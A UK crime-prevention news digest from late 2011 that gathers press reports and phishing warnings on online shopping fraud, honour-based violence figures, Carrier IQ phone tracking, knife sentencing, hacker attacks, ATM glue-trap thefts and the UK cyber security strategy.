This e mail is bogus and is just phishing for personal information. If you receive something like it, delete it immediately and do not CLICK on any link or open any attachments. If you are suspicious about activity on any account (be it a bank or utility), contact your bank or supplier direct using a known telephone number, DO NOT use contact details within these bogus e-mails.

(5th December 2011)


 

ONLINE SHOPPERS WARNED OF RECORD FRAUD THREATS THIS CHRISTMAS
(London Evening Standard, dated 2nd December 2011 author Mark Prigg)
www.thisislondon.co.uk  [Note 1]

Londoners could be hit by record levels of fraud while shopping online this Christmas.

A survey found those in the capital were most likely to ignore basic safety rules, leaving themselves open to hackers emptying their bank accounts.

Last year it was estimated that £67?million of fraud took place at Christmas, and that figure could be beaten this year. A YouGov poll found that 43 per cent of Londoners never check a website's contact details, putting themselves at risk of fraud.

Owen Roberts of Callcredit, which commissioned the research, said: "Once a thief has your personal information, they can wreak havoc with your finances.

"This could result in your credit cards being maxed out or your bank accounts being drained by fraudsters, making buying Christmas presents almost impossible." It comes as retailers prepare for what could be the biggest day in history for online spending on Monday. IMRG, the UK trade body for online retailers, predicts £3.72 billion will be spent online over the next two weeks. Claudine Beaumont of Google warned shoppers to use common sense. She said: "Try to get a feel for the average cost of that item online, and if you see a merchant selling it for significantly less, proceed with caution.

"If you're shopping with a new or unfamiliar retailer, do some research - see if other customers have left reviews describing their experience with the seller before you spend your money with them."

How to avoid the hackers' web trap

- Don't use the same passwords for online bank accounts and email.

- Keep software on your computer up to date so there are no weaknesses that can be exploited by hackers.

- Use a modern, secure web browser, such as Chrome.

- If an offer looks too good to be true, it probably is, so buy with caution.

(5th December 2011)


 

"HONOUR" ATTACK NUMBERS REVEALED BY UK POLICE FORCES
(BBC News, dated 3rd December 2011)
www.bbc.co.uk

UK police recorded at least 2,823 so-called honour attacks last year, figures from 39 out of 52 forces show.

A freedom of information request by the Iranian and Kurdish Women's Rights Organisation (Ikwro) revealed that nearly 500 of these were in London.

Among the 12 forces also able to provide figures from 2009, there was an overall 47% rise in such incidents.

Honour attacks are punishments on people, usually women, for acts deemed to have brought shame on their family.

'Mutilations'
 
Such attacks can include acid attacks, abduction, mutilations, beatings and in some cases, murder.

Ikwro said its research, carried out between July and November, is the best national estimate so far of the extent of honour violence in Britain, although the charity says the figures do not give the full picture.

They found that eight police forces had recorded more than 100 honour-based attacks each in 2010.

The Metropolitan Police had the most at 495, followed by West Midlands (378), West Yorkshire (350), Lancashire (227), Greater Manchester (189), Cleveland (153), Suffolk (118) and Bedfordshire (117).

Of the 12 police forces able to provide 2009 comparison figures, nine recorded a rise in attacks and three saw totals fall.

The biggest rise was in Northumbria, which saw figures leap by 305% from 17 in 2009 to 69 in 2010, followed by a 154% jump in Cambridgeshire from 11 to 28.

A quarter of police forces in the UK were unable or unwilling to provide data and communities have often been reluctant to talk about the crime, Ikwro said.

Its director Diana Nammi said families often tried to deny the existence of honour attacks and those who carried them out were "very much respected".

She told the BBC: "The perpetrators will be even considered as a hero within the community because he is the one defending the family and community's honour and reputation."

She added that there was not enough support for victims, and many needed continuing help and protection.

"For some cases, police and some organisations just help them up to a length of time, then they will stop," she said. "With honour-based violence, the threat may be a lifetime threat for them."

Significant number

Ikwro's report said : "This is the first time that a national estimate has been provided in relation to reporting of honour-based violence. "The number of incidents is significant particularly when we consider the high levels of abuse that victims suffer before they seek help."
The Association of Chief Police Officers (Acpo) published a strategy in 2008 aimed at gauging the scale of the problem and recommending that all English and Welsh forces start recording the number of honour incidents.

Of the UK's 52 forces, 45 have now done that, although there is no national guidance in Scotland.

The 52 comprise 39 in England, four in Wales, eight in Scotland, and the Police Service of Northern Ireland.

Commander Mak Chishty, the Association of Chief Police Officers lead for honour-based violence, said he was satisfied the 2008 strategy was being implemented.

"We're now in consultation on a new strategy. All front-line staff have received awareness training and every force has a champion on honour-based abuse.

"Acpo is confident that any victim who comes to us will receive the help they need."

A Home Office spokesman said: "We are determined to end honour violence and recognise the need for greater consistency on the ground to stop this indefensible practice.

"Our action plan to end violence against women and girls sets out our approach to raise awareness, enhance training for police and prosecutors and better support victims."

Further information

Iranian and Kurdish Women's Rights Organisation : http://ikwro.org.uk/

Association of Chief Police Officers - Honour Based Violence Strategy ( Please note the date of review and the current fact [according to article] that Police Forces are not recording this type of crime) :

http://www.acpo.police.uk/documents/crime/2008/200810CRIHBV01.pdf

(5th December 2011)


 

HAS YOUR PHONE BEEN TAPPED BY HIDDEN SPY APP ?
(Metro, dated 2nd December 2011 author Aidan Radnedge)
www.metro.co.uk [Note 1]

Secret software installed on millions of smartphones may be monitoring every text, email and internet page you see. The Carrier IQ app is installed on at least 140 million Android, Blackberry, Apple and Symbian phones.

In what IT analysts say is an "illegal wire tap", Carrier IQ monitors every "keystoke" that is typed in, as well as locations and other data.

Although its California based creators deny any wrongdoing, anyone with the software on their phone is being urged to consider legal action.

Carrier IQ did not respond tp Metro calls but did post a message on the company's website. It said"While we look at many aspects of a devices performance, we are counting and summarising performance, not recoding keystrokes or providing tracking tools".

But Ernest Doku, technology expert at consumer website uSwitch.com, said: "The extent on the data Carrier IQ have access to - passwords, secure browsing information and bank details - is genuinely frightening for businesses and consumers alike.

There needs to be clarity and transparency on what these stealthy applications can do. The deeply-embedded surveilance app is mainly found in the US. Nokia, O2, Vodafone and Blackberry yesterday insisted it was not installed on their phones in Britain.


 

Further Information

Extract from an article in Computer World, dated 1st December 2011 author Jaikumar Yijayan)

What does Carrier IQ do?

Mountain View, Calif.-based Carrier IQ sells software designed to help wireless service providers and device makers identify and diagnose service and quality related problems such as dropped calls and battery drain. The software can be used to collect data for analyzing service quality, device quality and what Carrier IQ calls mobile customer experience.

Carrier IQ says its software is installed on over 150 million devices worldwide.

Earlier this month, Trevor Eckhart, a 25-year-old security researcher from Connecticut published details of research he had done showing how Carrier IQ software can be easily tweaked to conduct surreptitious and highly intrusive tracking of Android, BlackBerry and other smartphone users.

Eckhart described the software as a keystroke logging rootkit that is hard-to-detect, hard-to-remove and programmed to run by default on millions of handsets without the users' knowledge.

In addition to collecting device and service related data, Carrier IQ's software can collect data about a user's location, application use, Web browsing habits, videos watched, texts read and even the keys they press, according to Eckhart. The software runs when the phone is switched on and can log all activities till it is switched off. Carriers can set 'triggers' or actions that cause specific data to be logged and sent to them.

Full article [Note 1] : http://cwonline.computerworld.com/t/7733097/930454165/542594/0/

(5th December 2011)


 

PROPORTION OF KNIFE CARRIERS JAILED FALLS
(BBC News, dated 2nd December 2011)
www.bbc.co.uk

The proportion of people jailed for carrying a knife in England and Wales has fallen to its lowest level for more than three years.

The Ministry of Justice says just over a fifth - 21% - of those convicted of possessing a knife or offensive weapon between July and September were jailed.

This is less than the previous three months and the lowest figure since the second quarter of 2008.

But the MoJ says this is a provisional figure and may be revised upwards.

Average sentences for those convicted have risen to almost seven months.

The proportion going to jail is still higher than it was in 2007, when it stood at 16%.

The MoJ said 5,466 people were caught carrying knives between July and September, down from 6,490 in 2009.

It says that although knife crime is falling it wants to send a strong message to those who carry knives by bringing in tougher sentences.

Jail terms
 
Increasing numbers of offenders have been given suspended prison terms and community sentences for carrying knives over the same period of July to September this year.

The total number of knife crimes has been steadily falling in recent years but the government is planning to bring in mandatory minimum sentences for teenagers who threaten people with knives, in response to criticism that people are getting off lightly for knife possession.

The measures will not apply to people under the age of 16 and only apply to England and Wales.

The number of juveniles convicted for knife crimes has fallen massively since 2007 but in the same period the proportion of juveniles going to jail has gone up.

The government is amending the Legal Aid & Sentencing Bill to require a minimum sentence of a four-month Detention and Training Order for 16- and 17-year-olds convicted of threatening people with knives.

According to an impact assessment, this could mean hundreds of extra teenagers will be given custodial sentences every year.

The MoJ assessment says 30 to 60 extra beds would be needed in secure accommodation for young people.

Its report says between 200 to 400 more 16- and 17-year-olds will receive custodial sentences every year at an annual cost of between £2m and £4m a year.

An MoJ spokesman said: "Knife crime is falling but we need to send a strong message to those who carry knives - any adult who commits a crime using a knife can expect to be sent to prison and serious offenders can expect a long sentence.

"Alongside this we are introducing a new offence of aggravated knife possession so anyone aged 16 or over who uses a knife to threaten and endanger others will face a custodial sentence."

Last year the Scottish government said the number of people convicted of carrying knives had fallen to 3,194, the lowest figure for a decade.

But the Scottish government launched a hard-hitting advertising campaign earlier this year, called the No Knives, Better Lives project, which saw a 35% reduction in knife-carrying in Inverclyde and a 29% fall in Renfrewshire.

Further information

Ministry of Justice data :

http://www.justice.gov.uk/publications/statistics-and-data/courts-and-sentencing/knife-possession.htm

(5th December 2011)


 

MORE NEWS FROM MY SPAM INBOX- NOVEMBER
Category : phishing
 
My Internet Service Providers (ISP) spam filter continues to do a good job. The phishing for Santander customer information that I reported on the 10th November has stopped as far as I am concerned. So apart from them I have only received three other phishing e-mails.

- Halifax Online : Titled "Important Halifax update regarding your privacy". Content : "Your Halifax Online Password and Memorable Information was restricted due to invalid log on attempts by a suspected third party user". Click on supplied link and provide your personal information.

- Halifax Online Banking : Titled : "Halifax restricted account notice". Content :"Your Halifax Online Password and Memorable Information was restricted due to invalid log on attempts by a suspected third party user". Click on supplied link and provide your personal information.

- Northern Rock : Titled :"Northern Rock Account Alert". Content : "Northern Rock are committed to making our service as safe as possible but you can also play your part to protect yourself. We noticed unauthorized access to your online account". Click on supplied link and provide your personal information.

These e mails are bogus and are just phishing for personal information. If you receive anything like thme, delete it immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within the bogus e-mails.

(30th November 2011)


 

UNITED NATIONS AGENCY "HACK ATTACK" INVESTIGATED
(BBC News, dated 29th November 2011)
www.bbc.co.uk

A group of hackers has posted more than 100 email addresses and login details which it claimed to have extracted from the United Nations.

Many of the emails involved appear to belong to members of the United Nations Development Programme (UNDP).

The group, which identified itself as Teampoison, attacked the UN's behaviour and called it a "fraud".

A spokeswoman for the UNDP said the agency believed "an old server which contains old data" had been targeted.
"The UNDP found [the] compromised server and took it offline," said Sausan Ghosheh."The server goes back to 2007. There are no active passwords listed for those accounts."Please note that UNDP.org was not compromised."

'Leak'
 
The details were posted on the website Pastebin under the Teampoison logo.

The message preceding the login details accused the UN of acting to "facilitate the introduction of a New World Order" and asked "United Nations, why didn't you expect us?"

Many of the email addresses given end in undp.org, but others appear to belong to members of the Organisation for Economic Co-operation and Development (OECD), the World Health Organisation (WHO) and the UK's Office for National Statistics (ONS). The poster noted that several of the accounts had "no passwords".

The message ended with the taunt: "The question now is how? We will let the so called 'security experts' over at the UN figure that out... Have a Nice Day."

Credit card attacks
 
The security company Sophos noted that Teampoison hackers had previously attacked the maker of the Blackberry smartphone's website and had published private information about former UK Prime Minister Tony Blair.

"Teampoison recently announced they were joining forces with Anonymous on a new initiative dubbed 'Operation Robin Hood', targeting banks and financial institutions," the firm's senior technology consultant, Graham Cluley wrote on Sophos's blog.

The groups said at the time that their operation aimed to take money from credit cards and donate it to individuals and charities.

They said people would not be harmed as the banks had to refund fraudulent charges.

Teampoison added a "shoutout" to Anonymous in its UN attack posting, adding a link to a Youtube video with more information about its banking attack plan.

These latest moves serve as a reminder that so-called hacktivists are skilled and willing to collaborate to take down their targets, according to Professor Alan Woodward from the University of Surrey's department of computing.
"One of the big problems is that there is so much data around that people forget about their older systems that still have valuable data on them," he said. "The lesson here is that anything that holds any data of any value must be protected."

30th November 2011)


 

FIFTEEN MEN ARE SENTENCED TO A TOTAL OF 48 YEARS IN PRISON
(Courtesy of : Metropolitan Police, dated 28th November 2011)
www.met.police.uk

Fifteen men have been sentenced to a total of 48½ years in prison following a complex drugs operation in Hackney. Sentencing took place at Snaresbrook Crown Court on 24 and 25 November, 2011.

The investigation by Hackney Police, in conjunction with Hackney Council and the UK Border Agency, involved a four-month operation in Ridley Road and Dalston Junction, E8, aimed at tackling class A drug dealing in the area

On Tuesday 19 July 2011, arrests were made as part of Operation Marsican, an initiative to tackle serious and organised crime in Hackney, which was jointly run and funded by the police and Hackney Council.

Since the arrest phase of this operation, overall crime in Dalston has fallen by 34 %. Violent crime has fallen by 61% in the area. It is believed that these reductions have been achieved largely due to the reduction of drug availability in the area. The amount of thefts, dips and cycle thefts have also been significantly reduced.

The individuals were sentenced for supplying and having is their possession Class A and Class B drugs. The terms of imprisonment ranged from 2 to 4 years.

DC Anna Saleh, from Hackney Police, said: "Drug dealing and associated crime has long plagued Ridley Road Market and the surrounding area. Operation Marsican was a 6 month joint initiative between Hackney police and Council aimed at targeting this problem. Its success has returned the streets to the local community and sends out a clear message that drug dealing will not be tolerated."

DI Rhys Willis, from Hackney's Op Bantam (Gun Unit) & Drug Squad, said: "The community of Hackney and Hackney Council were extremely concerned about blatant drug dealing in this busy market. This was a painstaking investigation involving Hackney's Safer Neighbourhoods Teams working alongside the Met's Serious Crime Directorate and relying heavily on Hackney Council's CCTV. With the planning and assistance of the Met's 3 area Territorial Support Group (TSG) and other TSG units, we effectively closed the market and swept up all of the dealers. The early inclusion and positive approach of the Crown Prosecution Service secured charges and due to excellent quality of the case file preparation, nearly all the defendants pleaded guilty. Although time consuming and costly, the end results illustrate these operations work. However, without the support of the local authority and their funding, achieving such results would be unattainable. "

Mayor of Hackney Jules Pipe said: "These sentences demonstrate that those committing serious crimes in our borough will be brought to justice. Residents told us that these individuals had been causing major issues in Dalston for some time. The strong partnership between the Council and Police enabled us to tackle this entrenched problem and has led to a significant reduction in crime in the area. This should serve as a warning to the minority involved in criminality that their behaviour will not be tolerated in Hackney."

(The four-month investigation was led by Operation Bantam, Hackney Police's proactive drugs and firearms squad. Also supporting the operation were the Council's CCTV unit, the Crown Prosecution Service (CPS), Dalston Safer Neighbourhoods policing team, and the Metropolitan Police's Territorial Support Group, dog unit, and air support team.)

(30th November 2011)


 

WHATS NEW IN COMPUTER SECURITY - NOVEMBER

All links under this heading are [Note 1]

The following is a group of article summaries on what is happening around the World when it comes to computer security. One way or another at least one of them will affect you.

HACKERS LAUNCH MILLIONS OF JAVA EXPLOITS
(Computer World, dated 29th November 2011 author Gregg Keizer)

Full Article [Note 1] : http://cwonline.computerworld.com/t/7729199/930454165/541884/0/

Hackers continue to launch attacks exploiting vulnerabilities in Oracle's Java software in record numbers, Microsoft said Monday.

Citing research from a recent report, Tim Rains, a director in the company's Trustworthy Computing group, said that up to half of all attacks detected and blocked by Microsoft's security software over a 12-month period were Java exploits. Altogether, Microsoft stopped more than 27 million Java exploits from mid-2010 through mid-2011.

The most commonly-blocked Java attacks -- to the tune of over 2.5 million of them -- in the first half of 2011 exploited a bug disclosed in March 2010 and patched by Oracle the same month. Second on the popularity chart for the full 12-month stretch was an exploit of a bug patched in early December 2008, nearly three years ago.

Editors Note : For all you Home computer users. Java is not just used in relation to coffee. It is a software language that allows your computer to provide such things as fancy graphic when surfing the internet. The version that is supplied by Oracle is independent of Microsoft, so will not be included in any updates from them.


 

HP LASERJET PRINTERS VULNERABLE TO ATTACKS
(Computer World, dated 29th November 2011 author Jaikumar Vijayan)

Full Article : http://cwonline.computerworld.com/t/7729199/930454165/541889/0/
Millions of Hewlett Packard Co.'s LaserJet printers contain a security weakness that could allow attackers to take control of the systems, steal data from them and issue commands that could cause the devices to overheat and catch fire, according to two researchers from Columbia University.

Company downplays danger threat, says fix is coming


 

CRIMINALS SABOTAGING CYBER MONDAY
(Computer World, dated 28th November 2011 author Gregg Keizer)

Full Article : http://cwonline.computerworld.com/t/7727305/930454165/541717/0/

Security experts today warned consumers of a rapidly mutating spam campaign using bogus messages from United Parcel Service (UPS) claiming that a package could not be delivered.

The spam run, which actually began earlier this month, is just one way that security researchers believe criminals will exploit the holiday season online buying spree.

According to Cloudmark engineering director Angela Knox, the UPS-based scam uses phony email to dupe recipients into either opening an attachment or clicking on a link to infect machines with malware.


 

LARGEST CYBER ATTACK SO FAR THIS YEAR
(Computer World, dated 24th December 2011 author Lucian Constantin)

Full Article :  http://cwonline.computerworld.com/t/7724338/930454165/541501/0/

A week-long Distributed Denial-of-Service (DDoS) attack that launched a flood of traffic at an Asian e-commerce company in early November was the biggest such incident so far this year, according to Prolexic, a company that defends websites against such attacks.

The DDoS attack consisted of four consecutive waves launched from multiple botnets between Nov. 5 and Nov. 12, 2011, Prolexic said. It estimated that up to 250,000 computers infected with malware participated in the attack, many of them in China.

At the height of the attack, those computers made 15,000 connections per second to the target company's e-commerce platform, swamping it with up to 45Gbps of traffic, Prolexic said. It declined to name the company, one of its clients, citing a confidentiality agreement. The reason for the attack is unknown, but a disgruntled user or a competitor performing industrial sabotage are two of the possibilities.


 

FOUR RISING THREATS FROM CYBERCRIMINALS
(Computer World, dated 21st November 2011 author John Brandon)

Full Article : http://cwonline.computerworld.com/t/7710836/930454165/540816/0/

Criminal hackers never sleep, it seems. Just when you think you've battened down the hatches and fully safeguarded yourself or your business from electronic security risks, along comes a new exploit to keep you up at night. It might be an SMS text message with a malevolent payload or an errant signal designed to jam GPS receivers.

Whether you're protecting corporate data or simply trying to keep your personal files safe, these threats -- some rapidly growing, others still emerging -- put your systems at risk. Fortunately, security procedures and tools are available to help you win the fight.


 

ANDROID MALWARE EXPLODES, JUMPS FIVE-FOLD SINCE JULY
(Computer World, dated 18th November 2011 author Gregg Keizer)

Full Article : http://cwonline.computerworld.com/t/7710836/930454165/540818/0/

Malware targeting Google's Android mobile operating system exploded in the last several months, its volume quintupling since July, Juniper Networks said today.

The rash of infected apps aimed at Android owners shows no sign of abating, said Dan Hoffman, Juniper's chief mobile security analyst and a member of the company's global threat center.

"We're seeing a mix of the traditional hacking community [working] on malware very similar to organized efforts on the PC side, as well as people who are just a little smart, the '15-year-old kid crowd,' who are able to hide some malicious content in an app," said Hoffman in an interview today.


 

FACEBOOK CONFIRMS NASTY PORN STORM
(Computer World, dated 15th November 2011 author Gregg Keizer)

Full Article : http://cwonline.computerworld.com/t/7703643/930454165/540284/0/

Facebook users have been bombarded with explicit and violent images in the latest malware campaign aimed at the giant social networking site, a security researcher said today.

The company confirmed the attack and said it had "dramatically limited the damage" and was on the trail of those responsible.

"For the last 24 hours, many people have reported seeing highly-offensive images on their Facebook news feeds," said Graham Cluley, a senior technology consultant at antivirus vendor Sophos, in an interview early Tuesday.

"But exactly how those images got there and what cause them to appear, is still somewhat of a mystery," Cluley added.

Cluley speculated that the attack may have been based on "clickjacking," which describes a type of attack where hackers plant invisible "buttons" on a website page. When a user clicks on the overlaying page component, they actually execute malicious code or script that can hijack their browser or personal computer.


 

HOW TO LOCK DOWN YOUR WIRELESS NETWORK
(Computer World, dated 11th November 2011 author Alex Wawro)

Full Article :  http://cwonline.computerworld.com/t/7696680/930454165/539862/0/

If you operate a wireless network for your home or business, it's important to ward it against opportunistic hackers seeking to steal your data or hijack your Wi-Fi for their own nefarious purposes. We spoke to Steven Andrs, CTO of security consulting firm Special Ops Security, to learn about the best ways to lock down your Wi-Fi. To get started, you'll need to log in to your router's administrative console by typing the router's IP address into your Web browser's address bar.

This includes changing passwords, and enabling encryption.


 

EU DATA PROTECTION REFORM WOULD PUT PRESSURE ON FOREIGN COMPANIES
(Computer World, dated 10th November 2011 author Lucian Constantin)

Full Article : http://cwonline.computerworld.com/t/7693734/930454165/539714/0/

The European Commission is preparing a major reform of the E.U. Data Protection Directive, which will focus on how foreign companies handle European consumer data.

In a joint statement released on Monday, European Justice Commissioner Viviane Reding and Germany's Federal Minister for Consumer Protection Ilse Aigner said that European consumers should have their data protected regardless of the country where companies processing it are established.




MOBILE THREATS TOP HOLIDAY SCAM LIST
(Computer World, dated 9th November 2011 author Eric Mack)

 

Full Article : http://cwonline.computerworld.com/t/7690293/930454165/539195/0/

Malware targeting Android-powered mobile devices and Apple computers top a list scams and security threats that shoppers people need to guard against this holiday season.

McAfee has released its annual 12 scams of Christmas list, warning of a 76% increase in malware targeting Android devices in the second quarter of 2011 over the first, including those that target QR codes, which many shoppers will be using to purchase or get information about products.


 

FEDS LEAD BIGGEST BOTNET TAKEDOWN EVER AND END MASSIVE FRAUD
(Computer World, dated 10th November 2011 author Gregg Keizer)

Full Article : http://cwonline.computerworld.com/t/7690293/930454165/539198/0/

The botnet takedown announced Wednesday by the U.S. Department of Justice was the biggest in history, according to a security company that worked with authorities to identify the alleged criminals.

Dubbed "DNS Changer," the collection of compromised computers numbered over four million machines, or more than twice the size of the Rustock botnet that Microsoft and U.S. law enforcement officials brought to its knees last March.

About a quarter of the bots were Windows PCs and Macs based in the U.S.

Feike Hacquebord, a senior threat researcher at Trend Micro, called the operation the "biggest cybercriminal takedown in history" in a blog post yesterday.

Trend Micro was one of several companies and organizations credited by the FBI for contributing to the investigation leading to the takedown. Others included Mandiant, Neustar, Spamhaus and the University of Alabama at Birmingham's computer forensics research group.


 

CALLING SERVICE HELPS CYBERCRIMINALS EXTRACT SENSITIVE INFO
(Computer World, dated 9th November 2011 author Lucian Constantin)

Full Article : http://cwonline.computerworld.com/t/7690293/930454165/539203/0/


Researchers from security vendor Trusteer have come across a professional calling service that caters to cybercriminals. The business offers to extract sensitive information needed for bank fraud and identity theft from individuals.

The security company spotted an advertisement for making on-demand calls in English and other European languages to private individuals, banks, shops, post offices and similar organizations. At a cost of $10 per call, cybercriminals were offered the possibility of obtaining the missing pieces of information they needed to pull off attacks.

Fraudsters can either use malware to steal personal and financial information or buy it from the underground market in bulk, said Amit Klein, Trusteer's chief technology officer. However, sometimes this information is insufficient to perform fraud, he added.


 

SOCIALLY ENGINEERED ATTACKS ON BUSINESS BANK ACCOUNTS
(Computer World, dated 8th November 2011 author Richi Jennings)

Full Article : http://cwonline.computerworld.com/t/7688406/930454166/539061/0/

Your business banking account is under threat from scammers posing as your bank. Yes, we've all heard of phishing, but this is different. Modern protections against bogus online bank transactions mean that fraudsters may only have part of the information they need to steal your money.

You've probably heard of the phone-based malware scams that have been doing the rounds for a few years. In a typical scenario, the victim gets a phone call from a call center pretending to be Microsoft. The fraudster goes on to remotely control the victim's PC and install malware; finally demanding payment to remove the malware.




DARPA GETS SERIOUS WITH INTERNET SECURITY
(Computer World, dated 8th November 2011 author Michael Cooney)

 

Full Article : http://cwonline.computerworld.com/t/7688182/930454165/538991/0/

The Defense Advanced Research Projects Agency (DARPA) had a big hand in creating the Internet and now its wants to get serious about protecting it.

At its Colloquium on Future Directions in Cyber Security this week, DARPA Director Regina Dugan said that since 2009, the agency has steadily increased its cyber research efforts. Its budget submission for fiscal year 2012 increased cyber research funding by $88 million, from $120 million to $208 million. In addition, over the next five years, the agency plans to increase its top-line budget investment in cyber research from 8% to 12%.


 

ISREAL GOVERNMENT WEBSITE DOWN, AFTER HACKER THREAT
(Computer World, dated 6th November author John Ribeiro)

Full Article : http://cwonline.computerworld.com/t/7682949/930454165/538613/0/


Israeli government websites were down on Sunday, two days after the hacker group Anonymous had threatened to attack the government for its maritime blockade of the Gaza Strip.

Israel has however said that the websites were down because of a server malfunction.

The English websites of the Mossad intelligence service, and Israel Defense Forces (IDF) were still down late Sunday. The website of Mossad was under maintenance, while that of IDF was not accessible. The website of the Israel Security Agency, known as Shabak or Shin Bet, was also under maintenance




LOOSE LIPS STILL SINK CORPORATE SHIPS
(Computer World, dated 3rd November 2011 author "Darlene Storm")

 

Full Article :  http://cwonline.computerworld.com/t/7679225/930454165/538477/0/

Social engineering contestants poured out the schmooze on these five different industries -- retail, airlines, food service, technology, and mobile services. Targeted companies were Apple, AT&T, Conagra Foods, Dell, Delta Airlines, IBM, McDonalds, Oracle, Symantec, Sysco Foods, Target, United Airlines, Verizon, and Walmart. Long before placing the 25-minute social engineering phone call, based on a "pretext" scenario, contestants used online resources to research and gather initial inteligence, develop an attack vector, and compile dossiers on their targets.


 

US REPORT WARNS OF RUSSIA, CHINA CYBER SPYING
(Computer World, dated 3rd November 2011 author Jeremy Kirk)

Full Article :  http://cwonline.computerworld.com/t/7679225/930454165/538480/0/


The U.S. can expect more aggressive efforts from countries such as Russia and China to collect information through cyberespionage in areas such as pharmaceuticals, defense and manufacturing, according to a new government report released Thursday.

The two countries were singled out in the report from the Office of the National Counterintelligence Executive, which also issued recommendations for how organizations can strengthen their defenses.

"Chinese actors are the world's most active and persistent perpetrators of economic espionage," the report said. "Russia's intelligence services are conducting a range of activities to collect economic information and technology from U.S. targets."

(30th November 2011)


THIEVES USING NEW GLUE TRAPS TO SNATCH CASH FROM MACHINES
(Evening News, dated 25th November 2011 author Justin Davenport)
www.thisislondon.co.uk  [Note 1]

Glue traps normally sold to catch rats and mice are being used in a new twist in bank cash machine thefts. The ploy is a variation of the Lebanese loop device which criminals used to trap bank cards in cash machines.

Police say that instead of using a trick to trap people's cards, crime gangs are now using gadgets to trap their cash. Customers who are victims of the con walk away from the cash machine believing it is broken. The fraudsters then move in and remove the device from the machines with the cash still attached.

One detective said there was increasing evidence of gangs using the devices across London.

He said: "They get between £30 to £50 a time or more and do the trick at different machines three to four times a night, so it can be quite lucrative."

The fraudsters use "sticky boards" covered with powerful glue which are sold to trap rats and mice.

They are inserted into the bank machines and trap cash as it is withdrawn. The detective said: "As soon as banks tighten up security in one area criminals come up with a new way of beating the system."

In the past thieves have used sophisticated methods of targeting customers, including using pinhole cameras, radio transmitters and false fronts for cash dispensers.

In one case a gang got away with £200,000 in just over a month using cash machine skimming devices.

A spokesman for cash machine network Link said there was anecdotal evidence that the number of cash machine frauds has risen in recent months and confirmed the trend of criminals using devices to prevent cash being ejected from the machines.

Last year more than £33million was fraudulently withdrawn from machines in Britain, a fall on the year before.

Police warn people to report anything suspicious about cash machines and watch out for people "surfing" their shoulder.

If they experience problems withdrawing cash they are advised to call their bank or credit card company immediately.

(25th November 2011)


 

BLACK FRIDAY ITUNES INFECTED CREDIT MALWARE ALERT
(BBC News, dated 24th November 2011)
www.bbc.co.uk

Criminals are targeting internet users with a new gift certificate scam, according to security experts.

Users receive an email that claims to be from Apple's iTunes store, warns the Eleven security blog (German language). The ZIP file attached contains malware that may allow hackers to gain access to the recipient's computer. The blog says the attack appears to have been timed to coincide with Black Friday, one of the US's busiest shopping days.

Black Friday was the name used by Philadelphia's police department in the 1960s to describe the day after Thanksgiving because of all the traffic jams caused by people visiting the city's stores.

It is now viewed by many retailers as the start of the Christmas shopping season. They mark the day with one-off discounts and other special offers.

Eleven says the period has become one of the most popular times for internet scammers to target users.

Infected offer
 
The security firm says that users are told they have been sent $50 (£32) of iTunes store credit and need to open an attached file to find out their certificate code.

The file contains a program known as Mal/BredoZp-B.

PCthreat.com says the software opens up a backdoor on Windows users' computers and may also capture passwords and other information. It says the code may also slow down the infected computer's performance and make files disappear.

The malware can be removed with the use of anti-spyware tools.

Facebook phishing
 
Security adviser Sophos warns of a separate threat linked to Facebook.

It says users are receiving emails claiming that they have violated the social network's policy regulations by annoying or insulting other members. An attached link take users to a web page that presents them with a fake "Facebook Account Disabled" form.

The firm says that members are then asked to fill in a series of forms requesting their login details, country of residence and the first six digits of their credit card number. If the users refuse they are told their account will be blocked automatically.

"New day, new attempt," writes Sophos's security writer Lisa Vaas on the company's blog.

"All these phishing scams boil down to a naked grab for your account details. Remember, neither Facebook nor other reputable social media sites would ask for this information."

(25th November 2011)


 

UK CYBER SECURITY STRATEGY DUE TO BE UNVEILED
(BBC News, dated 25th November 2011)
www.bbc.co.uk

The government will reveal its plan to tackle cyber crime later, including using the intelligence agency GCHQ to help the private sector protect itself.

Police forces will be encouraged to train "cyber specials", while specialist Army reservists could also be used to provide particular skills. There will also be a big focus on helping the public protect themselves.

It comes as the amount - currently about 6% - of UK GDP generated by the internet continues to grow.

The increasing dependence on the digital world carries risks and the cyber security strategy is aimed at outlining responses to minimise them.

Last year's national security strategy ranked hostile computer attacks on a par with international terrorism as a threat to the UK.

Ministers then announced an extra £500m for cyber security, particularly to bolster protection for key infrastructure and defence assets.

The government says there are more than 20,000 malicious emails sent to its networks each month, 1,000 of which are deliberately targeted.

'Kitemarking'
 
The strategy is expected to include a new joint initiative between the public and private sector to exchange crucial information on cyber threats and to manage the response to attacks.

It is also expected to set out ways in which GCHQ can help private companies and improve the wider UK cyber security sector.

There will be further details on the Ministry of Defence's new Defence Cyber Operations Group, and a plan to encourage all police forces to follow the lead of the Metropolitan Police and train cyber specialists.

Individuals will also be given more help to protect themselves, amid a warning from GCHQ that 80% of successful attacks could be thwarted by following simple steps like updating anti-virus software regularly.

The strategy is expected to suggest "kitemarking" for cyber security software to help consumers and businesses avoid "scareware" - software which purports to be helpful but is, in fact, malicious.

Earlier this month, the UK hosted an international cyber security conference, drawing together representatives from 60 nations.

The event came soon after GCHQ warned that cyber attacks on the UK were at "disturbing" levels.

Iain Lobban, the head of GCHQ, told the conference that a "significant" attempt was made to target the computer systems of the Foreign Office and other government departments over the summer.

Baroness Neville-Jones, the prime minister's special representative to business on cyber security, said Russia and China - who both attended the conference - were some of the worst culprits involved in cyber-attacks.

Outlining the national security strategy last October, Foreign Secretary William Hague said businesses and individuals must be aware of the risk of cyber attacks, as well as governments.

He said such attacks could become a major threat to the country's economic welfare and its national infrastructure, such as electricity grids.

(25th November 2011)


 

MET COMMISSIONER LAUNCHES WAR ON CRIME
(BBC News, dated 24th November 2011)
www.bbc.co.uk

Britain's top police officer has launched his "war on crime" as about 4,000 police officers raided homes in a massive one-day crackdown.

Scotland Yard Commissioner Bernard Hogan-Howe was joined by London Mayor Boris Johnson on one of the raids. The pair watched as officers smashed their way into a suspected drugs den in Peckham, south-east London.

At least 278 arrests were made as police raided properties in 32 London boroughs. The Metropolitan Police (Met) conducted 580 operations, searching 264 premises, seizing 39 weapons and closing down 14 drugs houses.

At a raid attended by Mr Hogan-Howe and Mr Johnson, police cautioned a woman in her 50s over possession of cannabis.

'Tackle criminals'
 
Unlike a previous raid he attended, officers stopped the London mayor entering the second-floor property. As he left, he remarked that it "may have been because of a scantily-clad lady" inside.

The Met said there would be a "visible" presence as part of the one-day Operation Hawk, which was aimed at targeting drug dealers, anti-social behaviour and other crimes.

